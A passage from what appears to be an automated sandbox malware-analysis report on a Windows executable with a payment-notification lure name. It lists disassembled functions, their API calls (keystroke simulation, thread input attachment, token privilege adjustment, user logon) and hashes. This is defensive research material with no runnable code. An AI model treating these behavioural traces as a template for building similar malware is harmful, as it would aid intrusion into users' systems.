Instruction Fuzzy Hash: B0F0C8B36006016ED7159F29D807F67BB98EF84760F10852AFA19CB1D1DB71E514CBA0

Function 00964C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00931129,00000000,?,00962E29,00000001,00000364,?,?,?,0095F2DE,00963863,00A01444,?,0094FDF5,?), ref: 00964CBE

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b2d0199680c83276b312c6cf9aa97916aae39b659c43638a2e4ac3af2f0495d0
Instruction ID: 1fde7bfb4944483c5b3d37bbe1393d22c7155feacdfbe49f81040ea0e80e7b34
Opcode Fuzzy Hash: b2d0199680c83276b312c6cf9aa97916aae39b659c43638a2e4ac3af2f0495d0
Instruction Fuzzy Hash: CAF0E93164622467DB219FE79C09FDA378CBFC17B1B148111FC9AEA380CA38D80197E0

Function 00963820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00A01444,?,0094FDF5,?,?,0093A976,00000010,00A01440,009313FC,?,009313C6,?,00931129), ref: 00963852

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 446c476f589aab2ea0dc6c14a2800171da6221a35ab6c843ad87045058ee3c57
Instruction ID: 05b80c2317ab226f46f0231990ef0e5615a60132aea312b2dd1919b79ad9a93d
Opcode Fuzzy Hash: 446c476f589aab2ea0dc6c14a2800171da6221a35ab6c843ad87045058ee3c57
Instruction Fuzzy Hash: 02E02231100224AAE7712BB79D05FDB3B5DAF827B1F098020FC1597C81CB20DE0283E1

Function 00934F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00A01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00934F6D

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: a9915c758ff2bfcea9613ab5ee2fb9702b293a75bb9e83d18138cb7bc7042786
Instruction ID: ed0df4d7705f6d86ff90be4e3c01f316de0fcc26495f1dd88bb0fe1b3688ac73
Opcode Fuzzy Hash: a9915c758ff2bfcea9613ab5ee2fb9702b293a75bb9e83d18138cb7bc7042786
Instruction Fuzzy Hash: 80F03071505751CFDB349F65D490812BBE4EF143197198DBEE1DA82611C735A844DF50

Function 0099CCFF Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,0097EE51,009F3630,00000002), ref: 0099CD26

Part of subcall function 0099CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,0099CD19,?,?,?), ref: 0099CC59
Part of subcall function 0099CC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,0099CD19,?,?,?,?,0097EE51,009F3630,00000002), ref: 0099CC6E
Part of subcall function 0099CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,0099CD19,?,?,?,?,0097EE51,009F3630,00000002), ref: 0099CC7A

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: File$Pointer$Write
String ID:
API String ID: 3847668363-0
Opcode ID: bf1767d6baa8b9eda40f23e3bafe06cb3b295631881d41b137b925bf38c904a6
Instruction ID: 94e3180d6314d104ee5ffe020bf914a7543385542639ecbe1a6f2f70d383f69c
Opcode Fuzzy Hash: bf1767d6baa8b9eda40f23e3bafe06cb3b295631881d41b137b925bf38c904a6
Instruction Fuzzy Hash: BEE03076400604EFCB219F4ADD0189ABBF8FF84350710852FE99582510D371AA54DB60

Function 00932DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00932DC4

Part of subcall function 00936B57: _wcslen.LIBCMT ref: 00936B6A

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 53e1693b957bb8cbb3c7ae87588f07bc3085178c3428d2cb3b799c7d3049b56e
Instruction ID: 03807be31b97ddb7aea6e139a128b362c7e362b048c8915b37ee1db931aac9b7
Opcode Fuzzy Hash: 53e1693b957bb8cbb3c7ae87588f07bc3085178c3428d2cb3b799c7d3049b56e
Instruction Fuzzy Hash: 39E0CD72A041245BC71092589C05FDA77EDDFC8790F044071FD0DD7248DA60ED808A50

Function 00932B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00933837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00933908

Part of subcall function 0093D730: GetInputState.USER32 ref: 0093D807

SetCurrentDirectoryW.KERNEL32(?), ref: 00932B6B

Part of subcall function 009330F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0093314E

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: 38091915ea2f73b2407b9b83314077cc2a1b8d1a2e4392b60a981cd3979d3914
Instruction ID: 7f5fd2cc97846e36cd9976a28f6ba3a7a1d23542468c774e82ca1b4c0b0a205c
Opcode Fuzzy Hash: 38091915ea2f73b2407b9b83314077cc2a1b8d1a2e4392b60a981cd3979d3914
Instruction Fuzzy Hash: 15E0866170424806C608BB74A8527ADA7599BD1351F40553EF146831A2CF6549464A51

Function 0097039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00970704,?,?,00000000,?,00970704,00000000,0000000C), ref: 009703B7

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ede3a14f233819364df8f2fe7800d5ebda7469636e168ce6fc70d929be628b02
Instruction ID: 1e2084b3caa51ef848e81bd102f651aaaf53d2b982955ffcae933d2052304b86
Opcode Fuzzy Hash: ede3a14f233819364df8f2fe7800d5ebda7469636e168ce6fc70d929be628b02
Instruction Fuzzy Hash: 57D06C3205410DBBDF028F85DD06EDA3FAAFB48714F014000FE1856020C732E821AB90

Function 00931CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00931CBC

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: ec699faecfb7cbb99bf7f04d8cacd9984114ea06baaaa5e597ac59bcf0abdecb
Instruction ID: f32d29b72a6649473ee6f85d1ea61a6bf9d87de64badc0b0486a327e0eea5cd4
Opcode Fuzzy Hash: ec699faecfb7cbb99bf7f04d8cacd9984114ea06baaaa5e597ac59bcf0abdecb
Instruction Fuzzy Hash: D2C092366C4308AFF314CBC0BC4EF507B64A348B04F048001F60DA96E3C3A22823EB55

Function 009A744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 00935745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0093949C,?,00008000), ref: 00935773

GetLastError.KERNEL32(00000002,00000000), ref: 009A76DE

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: 47ed3cafd144cd3d9bc38945027ae7776034aafd362caa0c36e3b2727b6bce82
Instruction ID: a40c672a06c9afc5268e38216907c900e34a409e8b3b9f26ddd85848a9984857
Opcode Fuzzy Hash: 47ed3cafd144cd3d9bc38945027ae7776034aafd362caa0c36e3b2727b6bce82
Instruction Fuzzy Hash: 2D8190306087019FCB14EF68C892B6AB7E5BF89354F04491DF8965B2A2DB34ED45CF92

Function 01315BEC Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 01315C01

Memory Dump Source

Source File: 00000000.00000002.1320204766.0000000001313000.00000040.00000020.00020000.00000000.sdmp, Offset: 01313000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1313000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: 038eaef89f472db66eec2230251f01f320e309a36685c49e8377a09c7ebd84b8
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 6DE0BF7494010DEFDB00EFA4D6496DE7BB4EF04301F1006A1FD05D7685DB309E548A62

Function 00936246 Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,00000000,009724E0), ref: 00936266

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 957440dc52586707577b11aa97db55829cb6ff544bbfc563be7caa2429353b74
Instruction ID: ca4f8242dae9e0385d7de6fba6109c073eaa1e20b3f26f17c52a1337475b8388
Opcode Fuzzy Hash: 957440dc52586707577b11aa97db55829cb6ff544bbfc563be7caa2429353b74
Instruction Fuzzy Hash: DAE0B675800B01DFC3314F1AE804412FBF9FFE13613218A2ED1F592660D3B058869F50

Function 01315BF0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 01315C01

Memory Dump Source

Source File: 00000000.00000002.1320204766.0000000001313000.00000040.00000020.00020000.00000000.sdmp, Offset: 01313000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1313000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: a6056c621bbf15e69beed1f7606f853f6c497d12bcd79b1ab810962ad3925a43
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: FEE0E67494010DDFDB00EFB4D64969E7FB4EF04301F100261FD01D2285D6309D508A62

Non-executed Functions

Function 009C9576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00949BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00949BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 009C961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 009C965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 009C969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009C96C9
SendMessageW.USER32 ref: 009C96F2
GetKeyState.USER32(00000011), ref: 009C978B
GetKeyState.USER32(00000009), ref: 009C9798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 009C97AE
GetKeyState.USER32(00000010), ref: 009C97B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009C97E9
SendMessageW.USER32 ref: 009C9810
SendMessageW.USER32(?,00001030,?,009C7E95), ref: 009C9918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 009C992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 009C9941
SetCapture.USER32(?), ref: 009C994A
ClientToScreen.USER32(?,?), ref: 009C99AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 009C99BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009C99D6
ReleaseCapture.USER32 ref: 009C99E1
GetCursorPos.USER32(?), ref: 009C9A19
ScreenToClient.USER32(?,?), ref: 009C9A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 009C9A80
SendMessageW.USER32 ref: 009C9AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 009C9AEB
SendMessageW.USER32 ref: 009C9B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 009C9B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 009C9B4A
GetCursorPos.USER32(?), ref: 009C9B68
ScreenToClient.USER32(?,?), ref: 009C9B75
GetParent.USER32(?), ref: 009C9B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 009C9BFA
SendMessageW.USER32 ref: 009C9C2B
ClientToScreen.USER32(?,?), ref: 009C9C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 009C9CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 009C9CDE
SendMessageW.USER32 ref: 009C9D01
ClientToScreen.USER32(?,?), ref: 009C9D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 009C9D82

Part of subcall function 00949944: GetWindowLongW.USER32(?,000000EB), ref: 00949952

GetWindowLongW.USER32(?,000000F0), ref: 009C9E05

Strings

F, xrefs: 009C9D07
@GUI_DRAGID, xrefs: 009C997D

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F
API String ID: 3429851547-4164748364
Opcode ID: 2980b0cda1d687b105e3e73d0fde9d7747746d7761cf531b93a0a1357d98e16a
Instruction ID: d86a98a3061e2dea8700b2508d09b2444581e39e43ed70b731293cae90947dc1
Opcode Fuzzy Hash: 2980b0cda1d687b105e3e73d0fde9d7747746d7761cf531b93a0a1357d98e16a
Instruction Fuzzy Hash: 54428B70A08201AFDB24CF64CD48FAABBE9FF88354F100A1DF599872A1D731A951DF52

Function 009C4873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 009C48F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 009C4908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 009C4927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 009C494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 009C495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 009C497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 009C49AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 009C49D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 009C4A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 009C4A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 009C4A7E
IsMenu.USER32(?), ref: 009C4A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009C4AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009C4B20
GetWindowLongW.USER32(?,000000F0), ref: 009C4B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 009C4BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 009C4C82
wsprintfW.USER32 ref: 009C4CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 009C4CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 009C4CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 009C4D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 009C4D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 009C4D5A

Strings

%d/%02d/%02d, xrefs: 009C4CA8

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: a02360dbc84e41ef5222af5a16966a96eb9408f4e4a31354e9555e87a0a373bc
Instruction ID: 76b7b827412daa9e8558060ef993e0c5bc704d9c46ed426ac303b2fadc0890f2
Opcode Fuzzy Hash: a02360dbc84e41ef5222af5a16966a96eb9408f4e4a31354e9555e87a0a373bc
Instruction Fuzzy Hash: 5712FF71A00215ABEB248F28CD69FAE7BF8EF85710F10412DF51AEB2E1DB749941CB51

Function 0094F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0094F998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0098F474
IsIconic.USER32(00000000), ref: 0098F47D
ShowWindow.USER32(00000000,00000009), ref: 0098F48A
SetForegroundWindow.USER32(00000000), ref: 0098F494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0098F4AA
GetCurrentThreadId.KERNEL32 ref: 0098F4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0098F4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 0098F4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0098F4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0098F4DE
SetForegroundWindow.USER32(00000000), ref: 0098F4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 0098F4F6
keybd_event.USER32(00000012,00000000), ref: 0098F501
MapVirtualKeyW.USER32(00000012,00000000), ref: 0098F50B
keybd_event.USER32(00000012,00000000), ref: 0098F510
MapVirtualKeyW.USER32(00000012,00000000), ref: 0098F519
keybd_event.USER32(00000012,00000000), ref: 0098F51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 0098F528
keybd_event.USER32(00000012,00000000), ref: 0098F52D
SetForegroundWindow.USER32(00000000), ref: 0098F530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 0098F557

Strings

Shell_TrayWnd, xrefs: 0098F46F

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: de411d985b5aa6ec511b55db9ac715a6a86937d12a4bbd952593474d363191e5
Instruction ID: bc54394ddfb2a853650ab3bcd0c7962673455a6addb94fddb1a1f5dc919aaec0
Opcode Fuzzy Hash: de411d985b5aa6ec511b55db9ac715a6a86937d12a4bbd952593474d363191e5
Instruction Fuzzy Hash: A03161B1E54218BBEB206BB55C4AFBF7E6CEB44B50F10042AFA05E61D1C6B45D00BB60

Function 00991201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 009916C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0099170D
Part of subcall function 009916C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0099173A
Part of subcall function 009916C3: GetLastError.KERNEL32 ref: 0099174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00991286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 009912A8
CloseHandle.KERNEL32(?), ref: 009912B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 009912D1
GetProcessWindowStation.USER32 ref: 009912EA
SetProcessWindowStation.USER32(00000000), ref: 009912F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00991310

Part of subcall function 009910BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009911FC), ref: 009910D4
Part of subcall function 009910BF: CloseHandle.KERNEL32(?,?,009911FC), ref: 009910E9

Strings

default, xrefs: 0099130B
, xrefs: 0099125A
winsta0, xrefs: 009912CC

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
